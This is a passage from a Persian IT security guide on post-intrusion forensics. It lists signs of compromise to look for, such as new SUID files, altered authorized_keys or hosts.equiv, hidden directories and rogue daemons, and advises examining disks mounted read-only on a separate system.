‫ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻳﺎ ﺑﻤﺒﻬﺎﻱ ﻣﻨﻄﻘﻲ ﻛﺎﺭ ﮔﺬﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺗﺎ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﺘﻮﺍﻧﺪ ﺻـﺪﻣﺎﺗﻲ ﺭﺍ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻭﺍﺭﺩ ﺁﻭﺭﺩ‪ .‬ﻳـﻚ ﻧـﺴﺨﺔ ﺳـﺎﻟﻢ ﺍﺯ ﻳـﻚ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺮﺭﺳﻲﻛﻨﻨﺪﻩ ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﻓﺎﻳﻠﻬﺎ ﻭ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﺳﺎﻟﻢ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺁﻥ ﺩﺭ ﺍﻳﻦ ﻣﻮﺍﻗﻊ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺍﺭﺯﺷﻤﻨﺪ ﺑﺎﺷﺪ‪.‬‬

‫ﻓﺎﻳﻠﻬﺎﻱ ‪ SUID‬ﻭ ‪ SGID‬ﺟﺪﻳﺪ‬


‫ﻣﻬﺎﺟﻤﺎﻧﻲ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺍﺑﺮﻛﺎﺭﺑﺮ ﺑﺪﺳﺖ ﻣﻲﺁﻭﺭﻧﺪ ﻏﺎﻟﺒﹰﺎ ﻓﺎﻳﻠﻬﺎﻱ ‪ SUID‬ﻭ ‪ SGID‬ﺟﺪﻳﺪﻱ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻨﺪ )ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﺳﻴـﺴﺘﻢ‬
‫ﺗﻌﺮﻳﻒ ﺷﺪﻩ ﺑﺎﺷﺪ(‪ .‬ﺑﻌﺪ ﺍﺯ ﻳﻚ ﻧﻔﻮﺫ‪ ،‬ﺩﺭ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺟﺴﺘﺠﻮ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻓﺎﻳﻠﻬﺎﻱ ‪ SUID‬ﺟﺪﻳﺪﻱ ﺍﻳﺠﺎﺩ ﻧﺸﺪﻩ ﺑﺎﺷﻨﺪ‪.‬‬

‫‪342 High Speed Disk Duplicator‬‬


‫‪343 Network Forensics Analysis Tools‬‬
‫‪٤٣٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺩﺳﺘﻜﺎﺭﻱ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺷﺒﻜﻪ‬


‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﺪ ﻳﺎ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺭﺍ ﺑﻪ ﻧﺤﻮﻱ ﺗﻐﻴﻴﺮ ﺩﻫﺪ ﮐﻪ ﺩﺭ ﺁﻳﻨﺪﻩ ﻫﻤﭽﻨﺎﻥ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺩﺳﺘﺮﺳـﻲ ﺭﺍﻩ‬
‫ﺩﻭﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻬﺎﺟﻢ ﺗﺤﺖ ‪ Unix‬ﻣﻲﺗﻮﺍﻧـﺪ ﻓﺎﻳﻠﻬـﺎﻱ ‪ .rhosts‬ﻳـﺎ ‪ .ssh/authorized_keys‬ﺟﺪﻳـﺪﻱ ﺩﺭ ﺷـﺎﺧﺔ‬
‫‪ home‬ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﺠﺎﺩ ﻛﻨﺪ‪ ،‬ﻭ ﻳﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﺭﺍ ﺩﺭ ﺳﻄﺢ ﺳﻴﺴﺘﻤﻲ ﺑﻪ ﻓﺎﻳﻞ ‪ /etc/hosts.equiv‬ﺍﺿـﺎﻓﻪ ﻧﻤﺎﻳـﺪ‪ .‬ﺗﻤـﺎﻡ ﺍﻳـﻦ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ‬
‫ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﺍﺯ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﻫﻢ ﺑﺨﻮﺍﻫﻴﺪ ﺣﺘﻤﹰﺎ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ‪.‬‬

‫ﺩﺳﺘﻜﺎﺭﻱ ﻓﺎﻳﻠﻬﺎﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ‬


‫ﻣﻬﺎﺟﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺤﺘﻮﻳﺎﺕ ﻓﺎﻳﻠﻬﺎﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﻛﻞ ﺳﻴﺴﺘﻢ ﻭ ﻳﺎ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺯﻣﺎﻧﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱﺷﺪﻩ ﻳﺎ ﺩﺭ ﺍﺛﺮ ﺑﺮﺧﻲ‬
‫ﺭﻭﻳﺪﺍﺩﻫﺎ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ )ﻣﺜﻞ ﺍﺭﺳﺎﻝ ﺧﻮﺩﻛﺎﺭ ﻧﺎﻣﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ( ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺑﺎﺷﺪ‪ .‬ﺗﻤﺎﻡ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺑﺎﻳﺪ ﺑﻪ ﺩﻗﺖ ﺑﺮﺭﺳﻲ ﺷﻮﻧﺪ‪.‬‬

‫ﺩﺳﺘﻜﺎﺭﻱ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ‬


‫ﻫﺮ ﺳﺮﻭﻳﺴﻲ ﻛﻪ ﺗﺤﺖ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻳﻚ ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ﻭ ﺍﺯ ﻳﻚ ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ ،‬ﻧـﺴﺒﺖ ﺑـﻪ ﺩﺳـﺘﻜﺎﺭﻱ‬
‫ﺍﻳﻦ ﻓﺎﻳﻞ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺖ‪ Windows Registry .‬ﺩﺭ ﺭﺃﺱ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺁﺳـﻴﺐﭘـﺬﻳﺮ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﺗﻤـﺎﻡ ﻓﺎﻳﻠﻬـﺎﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ‬
‫ﺳﺮﻭﻳﻬﺎ ﺑﺎﻳﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺳﺎﻟﻢ ﻳﺎ ﺍﻣﻀﺎﻫﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﺮﺭﺳﻲ ﺷﻮﻧﺪ‪.‬‬

‫ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﻣﺨﻔﻲ‬


‫ﻣﻬﺎﺟﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺷﺎﺧﺔ ﻣﺨﻔﻲ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﻳﺠﺎﺩ ﻛﺮﺩﻩ ﺑﺎﺷﺪ ﻭ ﺍﺯ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺑﻌﻨﻮﺍﻥ ﻣﺨﺰﻧﻲ ﺑـﺮﺍﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺯﺩﻳـﺪﻩﺷـﺪﻩ ﻳـﺎ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺍﻣﻨﻴﺖ ﺭﺍ ﺧﺪﺷﻪﺩﺍﺭ ﻣﻲﻛﻨﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﻻ ﺑﺮﺍﻱ ﭘﻨﻬﺎﻥ ﻛﺮﺩﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﺩﺭ ﻳﻚ ﺷﺎﺧﻪ‪ ،‬ﺍﺯ ﻧﺎﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﻪ ﺳﺨﺘﻲ ﺑﺘﻮﺍﻥ ﺁﻧﺮﺍ ﻛـﺸﻒ ﻳـﺎ ﺩﺭ ﺧـﻂ‬ ‫ﻣﻬﺎﺟﻤﺎﻥ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻔﻬﻤﺪ ﺩﺭﻭﻥ ﺁﻥ ﭼﻴﺴﺖ‪ .‬ﻧﺎﻣﻬﺎﻱ‬ ‫ﻓﺮﻣﺎﻥ ﻭﺍﺭﺩ ﻛﺮﺩ‪ .‬ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﻳﻚ ﺭﺍﻫﺒﺮ ﻣﺒﺘﺪﻱ ﺳﻴﺴﺘﻢ ﻛﻪ ﺁﻥ ﺷﺎﺧﻪ ﺭﺍ ﻛﺸﻒ ﻛﻨﺪ ﺍﺣﺘﻤﺎ ﹰ‬
‫ﻻ ﺣﺎﻭﻱ ﺭﺷﺘﻪ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻳﻲ ﭼﻮﻥ " ‪) "..‬ﻧﻘﻄـﻪ ﻧﻘﻄـﻪ ﻓﺎﺻـﻠﻪ( ﻭ ﻳـﺎ ﻣـﺸﺎﺑﻪ ﺁﻥ‪،‬‬ ‫ﻓﺎﻳﻠﻲ ﻛﻪ ﺑﻪ ﺳﺨﺘﻲ ﻣﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﻛﺸﻒ ﻳﺎ ﻭﺍﺭﺩ ﻛﺮﺩ ﻣﻌﻤﻮ ﹰ‬
‫ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﻛﻨﺘﺮﻟﻲ‪ ،backspace ،‬ﻳﺎ ﺳﺎﻳﺮ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﺧﺎﺹ ﻫﺴﺘﻨﺪ‪ .‬ﺑﺮﺧﻲ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﺍﻳﻦ ﻗﺒﻴﻞ ﻧﺎﻣﻬﺎ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ‪unicode‬‬
‫ﻭﺍﺭﺩ ﻛﺮﺩ ﻭ ﻧﻤﺎﻳﺶ ﺁﻧﻬﺎ ﻫﻢ ﻫﻤﺎﻧﻨﺪ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﺍﻟﻔﺒﺎﻳﻲ ﻣﻌﻤﻮﻟﻲ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﻣﻌﻤﻮﻟﻲ ﺁﻧﻬﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺻﻔﺤﻪﻛﻠﻴﺪ‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﺭﻭﺵ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺍﺯ ﻣﻬﺎﺟﻤﺎﻥ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺎﻣﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎ ﺍﺳﺖ ﻛﻪ ﮔﻮﻳﻲ ﺟﺰﺋﻲ ﻣﻬﻢ ﺍﺯ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﻧﺒﺎﻳﺪ ﺑﺎ ﺁﻧﻬﺎ ﺑﺎﺯﻱ ﻛﺮﺩ‪) .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻠﻲ ﻛﻪ ﺻﻔﺖ "‪ "system‬ﺑﺮﺍﻱ ﺷﺎﺧﻪﻫﺎ ﺩﺍﺭﻧﺪ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺩﺭ ﺍﻳﻦ ﺣﻘﻪ ﮔﺮﻓﺘﺎﺭ ﻣﻲﺷﻮﻧﺪ ﻭ ﻗﺪﺭﺕ ﻣﺎﻧﻮﺭ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﺭﺍ ﺩﺭ ﺍﻳﻦ ﺷﺎﺧﻪﻫﺎ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﻨﺪ‪(.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻓﺎﻳﻠﻬﺎﻱ ﺑﺪﻭﻥ ﻣﺎﻟﻚ‬


‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ‪ ،‬ﻣﻬﺎﺟﻤﺎﻥ ﻓﺎﻳﻠﻬﺎﻳﻲ ﺭﺍ ﺩﺭ ﺳﻴﺴﺘﻢ ﺑﺎﻗﻲ ﻣﻲﮔﺬﺍﺭﻧﺪ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻫﻴﭻ ﻛﺎﺭﺑﺮ ﻳﺎ ﮔﺮﻭﻫﻲ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻲﺗﻮﺍﻧـﺪ ﻭﻗﺘـﻲ‬
‫ﺍﺗﻔﺎﻕ ﺑﻴﺎﻓﺘﺪ ﻛﻪ ﻣﻬﺎﺟﻢ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻭ ﭼﻨﺪ ﻓﺎﻳﻞ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ‪ ،‬ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﺭﺍ ﭘﺎﻙ ﻣﻲﻧﻤﺎﻳﺪ‪ ،‬ﻭﻟﻲ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑـﻪ ﺁﻧـﺮﺍ‬
‫ﺑﺎﻗﻲ ﻣﻲﮔﺬﺍﺭﺩ‪ .‬ﻳﻚ ﺍﺣﺘﻤﺎﻝ ﺩﻳﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺑﺎﺷﺪ ﻛﻪ ﻣﻬﺎﺟﻢ ﺩﺍﺩﻩﻫﺎﻱ ﺧﺎﻡ ﺭﻭﻱ ﺩﻳﺴﻚ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ )ﻭ ﻧﻪ ﺍﺯ ﻃﺮﻳﻖ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ( ﺗﻐﻴﻴـﺮ‬
‫ﺩﺍﺩﻩ ﻭ ﻳﻚ ‪ UID‬ﺭﺍ ﺑﻪ ﺍﺷﺘﺒﺎﻩ ﻋﻮﺽ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬

‫ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﺟﺪﻳﺪ‬


‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻬﺎﺟﻤﺎﻥ )ﻭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﻬﺎﺟﻤﻲ( ﺗﻌﺪﺍﺩﻱ ‪ daemon‬ﺷﺒﻜﻪﺍﻱ ﻧﺼﺐ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺩﺭ ﺁﻳﻨﺪﻩ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺩﺭﺏ ﻣﺨﻔـﻲ ﺑـﻪ‬
‫ﻣﻴﺰﺑﺎﻥ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﻳﺎ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﻫﺪﺍﻳﺖ ﻣﻴﺰﺑﺎﻥ ﺩﺭ ﺣﻤﻠﻪ ﺑﻪ ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺩﻳﮕﺮ )ﺑﻌﻨﻮﺍﻥ ﻳﻚ ‪ (zombie‬ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻨﺪ‪ .‬ﻫﺮﭼﻨﺪ ﻭﺟﻮﺩ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺟﺪﻳﺪ ﺭﺍ ﮔﺎﻫﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺧﺮﻭﺟﻲ ﺩﺳﺘﻮﺭﺍﺕ ﺳﻴﺴﺘﻤﻲ ﻣﻴﺰﺑﺎﻥ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﭘﻴﺪﺍ ﻛﺮﺩ‪ ،‬ﺍﻣـﺎ ﺧـﻮﺩ ﺍﻳـﻦ‬
‫ﺩﺳﺘﻮﺭﺍﺕ ﻧﻴﺰ ﻏﺎﻟﺒﹰﺎ ﺩﺳﺘﻜﺎﺭﻱ ﻣﻲﺷﻮﻧﺪ ﺗﺎ ﺧﺮﻭﺟﻲ ﺻﺤﻴﺤﻲ ﺗﻮﻟﻴﺪ ﻧﻜﻨﻨﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﻴﺪ ﻭﺟﻮﺩ ‪daemon‬ﻫﺎﻱ ﺟﺪﻳﺪ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٣٨‬‬

‫ﺍﺯ ‪ nmap‬ﻳﺎ ﭘﻮﻳﺸﮕﺮ ﭘﻮﺭﺕ ﺩﻳﮕﺮﻱ ﺍﺯ ﻳﻚ ﻣﺎﺷﻴﻦ ﺩﺳﺘﻜﺎﺭﻱﻧﺸﺪﻩ ﺭﻭﻱ ﻫﻤﺎﻥ ﺷﺒﻜﻪ ﺩﺭﻳﺎﺑﻴﺪ‪) .‬ﺍﻟﺒﺘـﻪ ﺍﺯ ﻧﻈـﺮ ﺍﻣﻨﻴﺘـﻲ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﻫﻨﮕﺎﻣﻴﻜـﻪ‬
‫ﻣﺎﺷﻴﻦ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﺗﺤﺖ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ ،‬ﺍﺭﺗﺒﺎﻁ ﺁﻥ ﺑﺎ ﺷﺒﻜﻪ ﻗﻄﻊ ﺑﺎﺷﺪ‪(.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﺗﻤﺎﻡ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺭﺍ ﻭﺍﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴﺪ ﺑﻪ ﭼﻪ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎﻳﻲ ﺩﺭ ﺣﻮﻝ ﻭ ﺣﻮﺵ ﺯﻣـﺎﻥ ﺣﻤﻠـﻪ‬
‫ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﺳﺮﻧﺨﻬﺎﻳﻲ ﺍﺯ ﺍﻳﻨﻜﻪ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﺍﻓﺘـﺎﺩﻩ ﺑﺪﻫـﺪ‪ .‬ﺑـﺮﺍﻱ ﻧﻤﻮﻧـﻪ ﺍﮔـﺮ ﻛﺎﻣﭙـﺎﻳﻠﺮ‪،‬‬
‫ﻻ ﻣﻬـﺎﺟﻢ ﻳـﻚ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪ ﺭﺍ‬ ‫ﺑﺎﺭﻛﻨﻨﺪﻩ‪ ٣٤٤‬ﻭ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎ ﺯﻣﺎﻧﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻧﺰﺩﻳﻜﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﻣﻲﺗﻮﺍﻥ ﻧﺘﻴﺠﻪ ﮔﺮﻓـﺖ ﻛـﻪ ﺍﺣﺘﻤـﺎ ﹰ‬
‫ﻛﺎﻣﭙﺎﻳﻞ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﮔﺮ ﻓﺎﻳﻠﻲ ﺭﺍ ﺑﺎﺯ ﻛﻨﻴﺪ ﺗﺎ ﺩﺭ ﺁﻥ ﺑﻪ ﺩﻧﺒﺎﻝ ﺗﻐﻴﻴﺮﺍﺕ ﺑﮕﺮﺩﻳﺪ‪ ،‬ﺯﻣﺎﻥ ﺁﺧﺮﻳﻦ ﺩﺳﺘﺮﺳﻲﺍﺵ ﻋﻮﺽ ﻣﻲﺷﻮﺩ ﻭ ﺩﻳﮕﺮ ﻧﺨﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﺍﻟﮕﻮﻫـﺎﻱ‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺘﻮﺟﻪ ﺷﻮﻳﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﺗﺤﻘﻴﻘﺎﺕ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺩﻳﺴﻚ ﻛﻪ ﺑﺼﻮﺭﺕ ﻓﻘـﻂ ﺧﻮﺍﻧـﺪﻧﻲ‬
‫‪ mount‬ﺷﺪﻩ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪ .‬ﺍﮔﺮ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﻧﺴﺨﺔ ﺩﻭﻡ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣﻨﺎﺳﺐ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻧﺪﺍﺭﻳﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﻛـﻪ‬
‫ﺍﻏﻠﺐ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ‪partition‬ﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺍﺳﺘﻔﺎﺩﺓ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﺑﺼﻮﺭﺕ ﻓﻘﻂﺧﻮﺍﻧﺪﻧﻲ ‪ mount‬ﻛﻨﻴﺪ )ﺍﺣﺘﻤﺎ ﹰ‬
‫ﻻ‬
‫ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻭﺍﺳﻂ ﻛﺎﺭﺑﺮﻱ ﺑﺎﺯﮔﺸﺘﻲ(‪ .‬ﺗﺤﻘﻴﻘﺎﺕ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺍﻳﻦ ﻃﺮﻳﻖ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪ ،‬ﺍﻣﺎ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺎ ﺍﻳﻦ ﺗﻨﻈﻴﻤـﺎﺕ ﻫـﻢ ﺍﺟـﺮﺍﻱ‬
‫ﺩﺳﺘﻮﺭﺍﺕ ﺑﺎﻋﺚ ﺧﻮﺍﻫﺪ ﺷﺪ ﻛﻪ ﺁﺧﺮﻳﻦ ﺯﻣﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻓﺎﻳﻠﻬﺎ ﻭ ﺗﻤﺎﻡ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎﻱ ﻣﺸﺘﺮﻙ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺗﻐﻴﻴﺮ ﻳﺎﺑﻨﺪ )ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ‬
‫ﻫﻤﻪ ‪partition‬ﻫﺎ ﺭﺍ ﻣﺠﺪﺩﹰﺍ ‪ mount‬ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ!(‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺑﻬﺘﺮﻳﻦ ﻛﺎﺭﻱ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻧﺠﺎﻡ ﺩﻫﻴـﺪ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺩﻳـﺴﻜﻬﺎ ﺭﺍ ﺭﻭﻱ ﻳـﻚ‬
‫ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﺑﺼﻮﺭﺕ ﻓﻘﻂﺧﻮﺍﻧﺪﻧﻲ ‪ mount‬ﻛﻨﻴﺪ ﻭ ﺑﺮﺭﺳﻴﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺁﻧﺠﺎ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪.‬‬

‫ﺑﻪ ﻫﻴﭻ ﭼﻴﺰ ﺟﺰ ﻧﺴﺨﺔ ﭼﺎﭘﻲ ﺍﻋﺘﻤﺎﺩ ﻧﻜﻨﻴﺪ‬


‫ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺳﺘﻜﺎﺭﻱ ﺷﺪﻩ ﺍﺳﺖ ﺑﻪ ﻫﻴﭻ ﭼﻴﺰﻱ ﺭﻭﻱ ﺩﻳﺴﻜﻬﺎﻱ ﺁﻥ ﻧﻤﻲﺗﻮﺍﻥ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩ‪ .‬ﺍﮔـﺮ ﺗﻐﻴﻴـﺮﺍﺕ ﻣـﺸﻜﻮﻛﻲ ﺩﺭ ﻓﺎﻳﻠﻬـﺎﻱ‬
‫ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﺪ ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﮔﻔﺘﻪﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﺎﻭﺭ ﻧﻜﻨﻴﺪ‪ ،‬ﭼﻮﻥ ﻳﻚ ﻧﻔﻮﺫﮔﺮ ﺧﻮﺏ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻤـﻪ ﭼﻴـﺰ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ‬
